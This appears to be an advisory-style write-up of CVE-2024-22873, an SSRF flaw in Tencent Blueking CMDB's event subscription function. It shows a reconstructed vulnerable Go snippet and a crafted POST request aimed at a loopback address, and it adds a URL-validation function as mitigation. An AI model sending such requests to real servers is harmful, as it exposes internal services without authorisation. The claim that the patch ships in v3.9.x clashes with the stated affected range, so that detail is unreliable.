In this article, we discuss the recent discovery of a critical security vulnerability in Tencent Blueking CMDB versions 3.2.x to 3.9.x, identified as CVE-2024-22873. This vulnerability is a Server-Side Request Forgery (SSRF) that affects the event subscription function (/service/subscription.go) and could potentially allow attackers to gain access to internal requests via a crafted POST request.

We'll take a deep dive into the technical details of this vulnerability, provide code snippets demonstrating the exploit, and link to the original references. By understanding the exploit's inner workings, developers and security professionals can better protect their systems from similar threats.

Vulnerability Details

The vulnerable component in Tencent Blueking CMDB is the event subscription function, which is responsible for processing user-submitted event information. In the affected versions, this function does not properly validate and sanitize input data, allowing an attacker to send a specially crafted POST request to trigger the SSRF vulnerability.

The following code snippet shows the vulnerable endpoint in /service/subscription.go (the elided parts are omitted by the original write-up; the imports are added here for completeness):

import (
  "bytes"
  "net/http"
)

func (s *Service) CreateEventSubscription(ctx *rest.Context) {
  ...
  url := ctx.Body("url") // Extract the callback URL from the POST request body
  ...
  // Vulnerable: the user-controlled URL reaches the HTTP client with no scheme, host or address check
  _, err = http.Post(url, "application/json", bytes.NewBuffer([]byte(data)))
}

In this code, http.Post is used to send an HTTP POST request to the URL provided by the user without any input validation or sanitization. This makes it possible for an attacker to make the server send internal requests that shouldn't be accessible from the outside.

Exploit Example

An attacker can exploit this vulnerability by sending a specially crafted POST request to the CreateEventSubscription endpoint. Here's an example of such a request:

POST /api/v3/event-subscribe/CreateEventSubscription/ HTTP/1.1
Host: victim-server.com
Content-Type: application/json
Content-Length: 81

{
  "event-name": "test-event",
  "method": "POST",
  "url": "http://localhost:808/internal"
}

The "url" field in the POST request body contains an internal address (e.g., http://localhost:808/internal) pointing at resources that should only be reachable from within the target server. Upon receiving this request, the vulnerable function sends an HTTP POST request to that address, potentially exposing sensitive information or compromising internal systems.

Mitigation

To mitigate this vulnerability, the development team has released a patch in Tencent Blueking CMDB v3.9.x, which includes proper input validation for the URLs passed to the event subscription function. Users are encouraged to update their installations to the latest version.
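The following Go function shows what "proper input validation" for a callback URL looks like in practice. It is an added example, not the Blueking CMDB project's patch: the function name, the injectable resolver parameter and the sample URLs are assumptions made for illustration. It accepts only http/https URLs whose host resolves exclusively to public addresses, which blocks the loopback target shown in the request above as well as private and link-local ranges.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
)

// ErrUnsafeURL is returned for any subscription URL that must not be fetched.
var ErrUnsafeURL = errors.New("subscription url rejected: not a public http(s) endpoint")

// isPublicIP reports whether ip lies outside the loopback, private, link-local,
// multicast and unspecified ranges that an SSRF payload typically points at.
func isPublicIP(ip net.IP) bool {
	return !(ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() || ip.IsMulticast() || ip.IsUnspecified())
}

// ValidateSubscriptionURL parses a user-supplied callback URL and resolves its
// host with lookup (pass net.LookupIP for real DNS; tests inject a fake).
// Every resolved address must be public, so a name that mixes public and
// internal records is rejected as a whole. Hypothetical helper, not project code.
func ValidateSubscriptionURL(raw string, lookup func(string) ([]net.IP, error)) error {
	u, err := url.Parse(raw)
	if err != nil {
		return ErrUnsafeURL
	}
	if u.Scheme != "http" && u.Scheme != "https" { // no file://, gopher://, etc.
		return ErrUnsafeURL
	}
	host := u.Hostname()
	if host == "" {
		return ErrUnsafeURL
	}
	ips := []net.IP{}
	if ip := net.ParseIP(host); ip != nil {
		ips = append(ips, ip) // literal address: no DNS lookup needed
	} else if ips, err = lookup(host); err != nil || len(ips) == 0 {
		return ErrUnsafeURL
	}
	for _, ip := range ips {
		if !isPublicIP(ip) {
			return ErrUnsafeURL
		}
	}
	return nil
}

func main() {
	// Constructed sample inputs: the page's loopback target and a documentation-range public address.
	for _, raw := range []string{"http://127.0.0.1:808/internal", "http://203.0.113.5/hook"} {
		fmt.Printf("%-32s -> %v\n", raw, ValidateSubscriptionURL(raw, net.LookupIP))
	}
}
```

Because http.Post resolves the hostname again when it connects, a production fix should also pin the validated IP in the client's dialer (or pass the validated address instead of the name) so that a DNS answer cannot change between the check and the request.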

The discovery of CVE-2024-22873 was documented in the following references:

1. Tencent Blueking CMDB Official Security Advisory
2. CVE-2024-22873 - National Vulnerability Database

In conclusion, the SSRF vulnerability in Tencent Blueking CMDB's event subscription function poses a significant risk to organizations using affected versions of the software. By understanding the vulnerability's technical details, developers and security professionals can apply proper mitigation techniques and keep their systems protected against possible exploits.

Timeline

Published on: 02/26/2024 16:27:56 UTC
Last modified on: 02/26/2024 16:32:25 UTC